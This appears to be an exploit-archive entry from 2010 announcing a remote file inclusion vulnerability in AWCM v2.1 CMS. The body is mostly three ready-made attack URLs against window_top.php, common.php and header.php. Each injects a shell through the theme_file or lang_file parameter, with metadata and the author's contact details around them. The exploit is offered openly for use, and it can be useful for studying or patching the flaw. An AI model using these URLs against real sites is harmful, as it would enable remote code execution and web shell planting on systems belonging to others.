AWCM v2.1 final Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AWCM v2.1 final Remote File Inclusion Vulnerability
# Published : 2010-11-13
# Author : LoSt.HaCkEr
# Previous Title : Wordpress Event Registration Plugin 5.32 SQL Injection Vulnerability
# Next Title : Pre Classified Listings PHP SQL Injection Vulnerability

[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
[+]Date: [13-11-2010]
[+]Author: LoSt.HaCkEr? ~? aDaM_TRoJaN
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.1]
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
[+]Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ LoSt.HaCkEr[at]HaCkEr.ps
http://sourceforge.net/projects/awcm/files/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Exploit: http://target/awcm v2.1 final/awcm/includes/window_top.php?theme_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/control/common.php?lang_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:? No Greet? !_!